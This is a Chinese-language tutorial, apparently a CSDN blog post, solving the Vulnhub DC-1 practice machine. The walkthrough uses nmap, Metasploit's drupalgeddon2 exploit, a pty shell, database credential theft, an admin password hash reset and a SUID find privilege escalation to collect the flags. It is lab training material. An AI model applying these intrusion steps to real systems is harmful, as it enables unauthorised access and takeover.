手把手教通关Vulnhub靶场-DC1靶机
一.靶机下载
官方链接:https://download.vulnhub.com/dc/DC-1.zip
网盘链接: https://pan.baidu.com/s/1hUO8FqiCkZ1ptvoCen9wPw 提取码: fdp4

导入之后要在设置中将其调为NAT模式

默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息
二.靶机信息收集
因为靶机与kali处于同一网络状态下,使用命令:arpscan -l 得到靶机的ip为:192.168.194.131

使用命令:nmap -A 192.168.194.131 对靶机进行扫描

发现靶机开放了22、80、111端口,尝试对80端口进行访问

发现是Drupal,可以使用msfconsole扫描其相关漏洞。
三.漏洞扫描
使用命令:msfconsole 进入工具

使用命令:search drupal 搜索有关drupal的漏洞

使用命令:use exploit/unix/webapp/drupal_drupalgeddon2 来利用这个漏洞

使用命令:show options 查看相应的配置

发现rhosts需要进行配置,使用命令:set rhosts 192.168.194.131
![]()
使用命令:exploit 进行利用

使用命令:ls 查看靶机文件

发现存flag1.txt,使用命令:cat flag1.txt 进行查看


提示查找CMS配置文件
四.查找配置文件
使用命令:shell 进入交互页面

使用命令:python -c "import pty;pty.spawn('/bin/bash')"
再使用命令:find ./ -name "*settings*"

切换到相应的文件夹下后,使用命令查看:cat settings.php

成功找到flag2,同时还发现数据库账密

五.连接数据库
使用命令:mysql -udbuser -pR0ck3t

使用命令:show databases;
use drupaldb;
show tables;

发现存在users表,使用命令查询:select * from users;

六.重置admin密码并插入数据库
搜索得到drupal 默认使用 password_hash.sh 生成密码
使用命令:find ./ -name "*hash*" 查找他所在的位置

使用命令:php ./scripts/password-hash.sh admin 生成admin密码

使用命令:
update users set pass="$S$Dv5WEuKQsnWbai9HfcPtqxQZydpq2UGvzfq6vXyIFSfcQU1ec67w" where name="admin";
将admin的密码进行重置

重新访问80端口,输入账号密码:admin,admin,点击相应的页面发现flag3



七.查找文件
因为提示passwd和shadow,使用命令:cat /etc/passwd

发现flag4存在路径,进行查看


八.提权
使用命令:find / -perm -u=s -type f 2>/dev/null
ls -l /usr/bin/find


发现find需要root权限,使用命令:
find / -exec "/bin/sh" \; cd /root/进行提权


成功获取最后的flag!
如有错误请大佬们指正!
到这里我们也是成功通关了DC1靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐



所有评论(0)